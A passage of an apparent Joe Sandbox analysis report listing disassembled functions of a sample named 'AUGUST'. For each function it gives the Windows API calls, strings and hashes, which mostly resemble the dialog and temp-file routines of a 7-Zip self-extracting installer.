Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9

GetSystemMetrics.USER32(00000007), ref: 00407A51
GetSystemMetrics.USER32(00000007), ref: 00407A62
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29

Strings

100%% , xrefs: 00407A81, 00407A88, 00407AE1

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99

Function 00407998 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00407A12

Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B

GetDlgItem.USER32(?,000004B3), ref: 004079C6

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4

Strings

(%u%s), xrefs: 00407A0C

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: TextWindow$ItemLength$??3@wsprintf
String ID: (%u%s)
API String ID: 3595513934-2496177969
Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68

Function 004021ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
GetProcAddress.KERNEL32(00000000), ref: 00402211

Strings

kernel32, xrefs: 00402205
GetNativeSystemInfo, xrefs: 00402200

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32
API String ID: 2574300362-3846845290
Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE

Function 00402185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
GetProcAddress.KERNEL32(00000000), ref: 0040219F

Strings

kernel32, xrefs: 00402193
Wow64RevertWow64FsRedirection, xrefs: 0040218E

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 2574300362-3900151262
Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C

Function 004021B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
GetProcAddress.KERNEL32(00000000), ref: 004021D1

Strings

kernel32, xrefs: 004021C5
Wow64DisableWow64FsRedirection, xrefs: 004021C0

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 2574300362-736604160
Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC

Function 00402A69 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F

Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$ByteCharMultiWide
String ID:
API String ID: 1731127917-0
Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658

Function 00403F85 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
wsprintfW.USER32 ref: 00403FFB
GetFileAttributesW.KERNEL32(?), ref: 00404016

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: PathTemp$AttributesFilewsprintf
String ID:
API String ID: 1746483863-0
Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88

Function 00401A85 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: CharUpper
String ID:
API String ID: 9403516-0
Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64

Function 00407FA5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
GetDlgItem.USER32(?,000004B7), ref: 00408020
SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E

Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92

Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
String ID:
API String ID: 2538916108-0
Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54

Function 004067ED Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
GetSystemMetrics.USER32(00000031), ref: 0040683A
CreateFontIndirectW.GDI32(?), ref: 00406849
DeleteObject.GDI32(00000000), ref: 00406878

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54

Function 0040748A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040749F
SHBrowseForFolderW.SHELL32(?), ref: 004074B8
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
SHGetMalloc.SHELL32(00000000), ref: 004074FE

Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: BrowseFocusFolderFromItemListMallocPathmemset
String ID:
API String ID: 1557639607-0
Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75

Function 004027C7 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801

Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@
String ID:
API String ID: 612612615-0
Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8

Function 00403AB1 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
SetWindowTextW.USER32(?,?), ref: 00403B12
??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98

Function 0040702A Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00407045
CreateFontIndirectW.GDI32(?), ref: 0040705B
GetDlgItem.USER32(?,000004B5), ref: 0040706F
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19

Function 00401BA3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00401BA8
GetWindowRect.USER32(?,?), ref: 00401BC1
ScreenToClient.USER32(00000000,?), ref: 00401BCF
ScreenToClient.USER32(00000000,?), ref: 00401BD6

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61

Function 00403C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00403C89

Strings

[G@, xrefs: 00403C64, 00403C88
GUIFlags, xrefs: 00403C68

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: _wtol
String ID: GUIFlags$[G@
API String ID: 2131799477-2126219683
Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D

Function 00402F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52

Strings

?O@, xrefs: 00402F23

Memory Dump Source

